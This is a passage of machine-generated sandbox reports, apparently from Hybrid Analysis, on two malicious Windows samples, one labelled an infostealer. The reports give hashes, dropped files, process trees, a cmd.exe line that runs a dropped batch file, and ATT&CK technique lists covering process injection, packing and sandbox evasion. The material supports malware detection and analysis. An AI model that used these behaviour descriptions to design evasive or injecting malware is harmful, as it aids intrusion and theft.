[C:\\464448.exe]- [targetUID: 00000000-00003568]\n \"frdfrrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frdfrrr.exe]- [targetUID: 00000000-00004372]\n \"txbxjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\txbxjp.exe]- [targetUID: 00000000-00004372]\n \"pdvxbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdvxbf.exe]- [targetUID: 00000000-00006080]\n \"lbjvvjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbjvvjh.exe]- [targetUID: 00000000-00006128]\n \"btpbndn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\btpbndn.exe]- [targetUID: 00000000-00004380]\n \"xxjrxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xxjrxn.exe]- [targetUID: 00000000-00004380]\n \"hrrnrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrrnrd.exe]- [targetUID: 00000000-00006032]\n \"hnvpxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnvpxj.exe]- [targetUID: 00000000-00003556]\n \"2680282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2680282.exe]- [targetUID: 00000000-00003556]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has section name UPX1 with entropy \"7.97244478673\"\n \"jvhfn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"042468.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2626426.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8428466.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"npxxxd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pffjpht.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vjxrx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"trnnjf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ttfvnn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"240606.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6402288.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bttfvf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hnjnfnj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjfjrfn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jfhhd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6804604.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"42828.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"068420.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4640804.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"866846.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"22840.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"24642.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"240802.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tbnhh.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has a section named \"UPX0\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has a section named \"UPX1\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has a section named \"UPX2\"\n \"jvhfn.exe\" has a section named \"UPX0\"\n \"jvhfn.exe\" has a section named \"UPX1\"\n \"jvhfn.exe\" has a section named \"UPX2\"\n \"042468.exe\" has a section named \"UPX0\"\n \"042468.exe\" has a section named \"UPX1\"\n \"042468.exe\" has a section named \"UPX2\"\n \"2626426.exe\" has a section named \"UPX0\"\n \"2626426.exe\" has a section named \"UPX1\"\n \"2626426.exe\" has a section named \"UPX2\"\n \"8428466.exe\" has a section named \"UPX0\"\n \"8428466.exe\" has a section named \"UPX1\"\n \"8428466.exe\" has a section named \"UPX2\"\n \"npxxxd.exe\" has a section named \"UPX0\"\n \"npxxxd.exe\" has a section named \"UPX1\"\n \"npxxxd.exe\" has a section named \"UPX2\"\n \"pffjpht.exe\" has a section named \"UPX0\"\n \"pffjpht.exe\" has a section named \"UPX1\"\n \"pffjpht.exe\" has a section named \"UPX2\"\n \"vjxrx.exe\" has a section named \"UPX0\"\n \"vjxrx.exe\" has a section named \"UPX1\"\n \"vjxrx.exe\" has a section named \"UPX2\"\n \"trnnjf.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (UID: 00000000-00004116)\n Spawned process \"2680282.exe\" (UID: 00000000-00003556)\n Spawned process \"hnvpxj.exe\" (UID: 00000000-00006032)\n Spawned process \"hrrnrd.exe\" (UID: 00000000-00004376)\n Spawned process \"xxjrxn.exe\" (UID: 00000000-00004380)\n Spawned process \"btpbndn.exe\" (UID: 00000000-00004120)\n Spawned process \"lbjvvjh.exe\" (UID: 00000000-00006128)\n Spawned process \"pdvxbf.exe\" (UID: 00000000-00006080)\n Spawned process \"txbxjp.exe\" (UID: 00000000-00004372)\n Spawned process \"frdfrrr.exe\" (UID: 00000000-00006060)\n Spawned process \"464448.exe\" (UID: 00000000-00003568)\n Spawned process \"jlrnp.exe\" (UID: 00000000-00005996)\n Spawned process \"tbxfnh.exe\" (UID: 00000000-00004124)\n Spawned process \"fptjxhr.exe\" (UID: 00000000-00004384)\n Spawned process \"ffjhjxx.exe\" (UID: 00000000-00006016)\n Spawned process \"84624.exe\" (UID: 00000000-00003724)\n Spawned process \"4682600.exe\" (UID: 00000000-00004448)\n Spawned process \"2040668.exe\" (UID: 00000000-00004156)\n Spawned process \"686200.exe\" (UID: 00000000-00002528)\n Spawned process \"026288.exe\" (UID: 00000000-00001416)\n Spawned process \"2420222.exe\" (UID: 00000000-00001420)\n Spawned process \"6088244.exe\" (UID: 00000000-00001696)\n Spawned process \"826268.exe\" (UID: 00000000-00002648)\n Spawned process \"phdjp.exe\" (UID: 00000000-00004040)\n Spawned process \"ldpfr.exe\" (UID: 00000000-00002564)\n Spawned process \"dtlrb.exe\" (UID: 00000000-00004496)\n Spawned process \"jrfndd.exe\" (UID: 00000000-00002136)\n Spawned process \"nvphdb.exe\" (UID: 00000000-00003900)\n Spawned process \"djlfb.exe\" (UID: 00000000-00004132)\n Spawned process \"4804042.exe\" (UID: 00000000-00001460)\n Spawned process \"46420.exe\" (UID: 00000000-00003908)\n Spawned process \"208666.exe\" (UID: 00000000-00003768)\n Spawned process \"2084042.exe\" (UID: 00000000-00002516)\n Spawned process \"08684.exe\" (UID: 00000000-00002596)\n Spawned process \"flrpd.exe\" (UID: 00000000-00004292)\n Spawned process \"pjjvtd.exe\" (UID: 00000000-00001500)\n Spawned process \"pdhfl.exe\" (UID: 00000000-00004172)\n Spawned process \"tlxll.exe\" (UID: 00000000-00003452)\n Spawned process \"bnrhnlj.exe\" (UID: 00000000-00002384)\n Spawned process \"rflrbrt.exe\" (UID: 00000000-00003188)\n Spawned process \"fxrlrh.exe\" (UID: 00000000-00003180)\n Spawned process \"nrjljrp.exe\" (UID: 00000000-00003460)\n Spawned process \"pjjdj.exe\" (UID: 00000000-00003580)\n Spawned process \"44266.exe\" (UID: 00000000-00003720)\n Spawned process \"6046286.exe\" (UID: 00000000-00004520)\n Spawned process \"8682642.exe\" (UID: 00000000-00001772)\n Spawned process \"2246640.exe\" (UID: 00000000-00001076)\n Spawned process \"064826.exe\" (UID: 00000000-00000596)\n Spawned process \"nffhjx.exe\" (UID: 00000000-00003200)\n Spawned process \"fnjvr.exe\" (UID: 00000000-00003944)\n Spawned process \"bjdjr.exe\" (UID: 00000000-00000112)\n Spawned process \"626200.exe\" (UID: 00000000-00000568)\n Spawned process \"02242.exe\" (UID: 00000000-00003976)\n Spawned process \"jpflb.exe\" (UID: 00000000-00003440)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" wrote 32 bytes to a remote process \"C:\\2680282.exe\" (Handle: 68)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" wrote 52 bytes to a remote process \"C:\\2680282.exe\" (Handle: 68)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" wrote 4 bytes to a remote process \"C:\\2680282.exe\" (Handle: 68)\n \"2680282.exe\" wrote 32 bytes to a remote process \"C:\\hnvpxj.exe\" (Handle: 120)\n \"2680282.exe\" wrote 52 bytes to a remote process \"C:\\hnvpxj.exe\" (Handle: 120)\n \"2680282.exe\" wrote 4 bytes to a remote process \"C:\\hnvpxj.exe\" (Handle: 120)\n \"hnvpxj.exe\" wrote 32 bytes to a remote process \"C:\\hrrnrd.exe\" (Handle: 116)\n \"hnvpxj.exe\" wrote 52 bytes to a remote process \"C:\\hrrnrd.exe\" (Handle: 116)\n \"hnvpxj.exe\" wrote 4 bytes to a remote process \"C:\\hrrnrd.exe\" (Handle: 116)\n \"hrrnrd.exe\" wrote 32 bytes to a remote process \"C:\\xxjrxn.exe\" (Handle: 116)\n \"hrrnrd.exe\" wrote 52 bytes to a remote process \"C:\\xxjrxn.exe\" (Handle: 116)\n \"hrrnrd.exe\" wrote 4 bytes to a remote process \"C:\\xxjrxn.exe\" (Handle: 116)\n \"xxjrxn.exe\" wrote 32 bytes to a remote process \"C:\\btpbndn.exe\" (Handle: 116)\n \"xxjrxn.exe\" wrote 52 bytes to a remote process \"C:\\btpbndn.exe\" (Handle: 116)\n \"xxjrxn.exe\" wrote 4 bytes to a remote process \"C:\\btpbndn.exe\" (Handle: 116)\n \"btpbndn.exe\" wrote 32 bytes to a remote process \"C:\\lbjvvjh.exe\" (Handle: 116)\n \"btpbndn.exe\" wrote 52 bytes to a remote process \"C:\\lbjvvjh.exe\" (Handle: 116)\n \"btpbndn.exe\" wrote 4 bytes to a remote process \"C:\\lbjvvjh.exe\" (Handle: 116)\n \"lbjvvjh.exe\" wrote 32 bytes to a remote process \"C:\\pdvxbf.exe\" (Handle: 68)\n \"lbjvvjh.exe\" wrote 52 bytes to a remote process \"C:\\pdvxbf.exe\" (Handle: 68)\n \"lbjvvjh.exe\" wrote 4 bytes to a remote process \"C:\\pdvxbf.exe\" (Handle: 68)\n \"pdvxbf.exe\" wrote 32 bytes to a remote process \"C:\\txbxjp.exe\" (Handle: 68)\n \"pdvxbf.exe\" wrote 52 bytes to a remote process \"C:\\txbxjp.exe\" (Handle: 68)\n \"pdvxbf.exe\" wrote 4 bytes to a remote process \"C:\\txbxjp.exe\" (Handle: 68)\n \"txbxjp.exe\" wrote 32 bytes to a remote process \"C:\\frdfrrr.exe\" (Handle: 116)\n \"txbxjp.exe\" wrote 52 bytes to a remote process \"C:\\frdfrrr.exe\" (Handle: 116)\n \"txbxjp.exe\" wrote 4 bytes to a remote process \"C:\\frdfrrr.exe\" (Handle: 116)\n \"frdfrrr.exe\" wrote 32 bytes to a remote process \"C:\\464448.exe\" (Handle: 60)\n \"frdfrrr.exe\" wrote 52 bytes to a remote process \"C:\\464448.exe\" (Handle: 60)\n \"frdfrrr.exe\" wrote 4 bytes to a remote process \"C:\\464448.exe\" (Handle: 60)\n \"464448.exe\" wrote 32 bytes to a remote process \"C:\\jlrnp.exe\" (Handle: 120)\n \"464448.exe\" wrote 52 bytes to a remote process \"C:\\jlrnp.exe\" (Handle: 120)\n \"464448.exe\" wrote 4 bytes to a remote process \"C:\\jlrnp.exe\" (Handle: 120)\n \"jlrnp.exe\" wrote 32 bytes to a remote process \"C:\\tbxfnh.exe\" (Handle: 68)\n \"jlrnp.exe\" wrote 52 bytes to a remote process \"C:\\tbxfnh.exe\" (Handle: 68)\n \"jlrnp.exe\" wrote 4 bytes to a remote process \"C:\\tbxfnh.exe\" (Handle: 68)\n \"tbxfnh.exe\" wrote 32 bytes to a remote process \"C:\\fptjxhr.exe\" (Handle: 116)\n \"tbxfnh.exe\" wrote 52 bytes to a remote process \"C:\\fptjxhr.exe\" (Handle: 116)\n \"tbxfnh.exe\" wrote 4 bytes to a remote process \"C:\\fptjxhr.exe\" (Handle: 116)\n \"fptjxhr.exe\" wrote 32 bytes to a remote process \"C:\\ffjhjxx.exe\" (Handle: 116)\n \"fptjxhr.exe\" wrote 52 bytes to a remote process \"C:\\ffjhjxx.exe\" (Handle: 116)\n \"fptjxhr.exe\" wrote 4 bytes to a remote process \"C:\\ffjhjxx.exe\" (Handle: 116)\n \"ffjhjxx.exe\" wrote 32 bytes to a remote process \"C:\\84624.exe\" (Handle: 116)\n \"ffjhjxx.exe\" wrote 52 bytes to a remote process \"C:\\84624.exe\" (Handle: 116)\n \"ffjhjxx.exe\" wrote 4 bytes to a remote process \"C:\\84624.exe\" (Handle: 116)\n \"84624.exe\" wrote 32 bytes to a remote process \"C:\\4682600.exe\" (Handle: 116)\n \"84624.exe\" wrote 52 bytes to a remote process \"C:\\4682600.exe\" (Handle: 116)\n \"84624.exe\" wrote 4 bytes to a remote process \"C:\\4682600.exe\" (Handle: 116)\n \"4682600.exe\" wrote 32 bytes to a remote process \"C:\\2040668.exe\" (Handle: 116)\n \"4682600.exe\" wrote 52 bytes to a remote process \"C:\\2040668.exe\" (Handle: 116)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0
https://hybrid-analysis.com/sample/b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0
Hybrid Analysis - Infostealers
{"size": 6775447, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0", "sha256": "b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0", "av_detect": 83, "vx_family": "Zusy.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 6, "total_signatures": 214, "extracted_files": [{"name": "_vslite.bat", "file_path": "%TEMP%\\_vslite.bat", "file_size": 249, "sha256": "72db0edf7d3003e983dca12a3d122d87ac5deb358d923c65bac7c0cd90454cb8", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe (PID: 2180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "gbp.ini", "file_path": "%TEMP%\\gbp.ini", "file_size": 104, "sha256": "30f820bb1ca6c20bcd77113c7377e01f31cdf0ec5b64864f22887d41a9bf3c7a", "type_tags": ["text"], "description": "ISO-8859 text, with no line terminators", "runtime_process": "syzoe.exe (PID: 328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "golfinfo.ini", "file_path": "%TEMP%\\golfinfo.ini", "file_size": 512, "sha256": "a3c735a73fa1edd8600f8f5e44c802a1c17205d58a70a8e4a11108352929f726", "type_tags": ["text"], "description": "Non-ISO extended-ASCII text, with very long lines (396), with NEL line terminators", "runtime_process": "bucei.exe (PID: 5888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "syzoe.exe", "file_path": "%TEMP%\\syzoe.exe", "file_size": 470670, "sha256": "9d7a2ceaddf1532971171083916cb85c18e5e1abe407c0ff7798a7607db6489b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "bytudy.exe (PID: 3640)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002180", "name": "b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe", "normalized_path": "C:\\b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe", "sha256": "b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0"}, {"uid": "00000000-00005888", "parentuid": "00000000-00002180", "name": "bucei.exe", "normalized_path": "%TEMP%\\bucei.exe", "sha256": "c1178a2ee40c62abb1c3453e163f454ec30507aa772ad079a6cc6dc4e74ff2aa"}, {"uid": "00000000-00003640", "parentuid": "00000000-00005888", "name": "bytudy.exe", "normalized_path": "%TEMP%\\bytudy.exe", "command_line": "OK", "sha256": "c1178a2ee40c62abb1c3453e163f454ec30507aa772ad079a6cc6dc4e74ff2aa"}, {"uid": "00000000-00000328", "parentuid": "00000000-00003640", "name": "syzoe.exe", "normalized_path": "%TEMP%\\syzoe.exe", "sha256": "9d7a2ceaddf1532971171083916cb85c18e5e1abe407c0ff7798a7607db6489b"}, {"uid": "00000000-00000336", "parentuid": "00000000-00003640", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\_vslite.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004204", "parentuid": "00000000-00002180", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\_vslite.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 5, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": 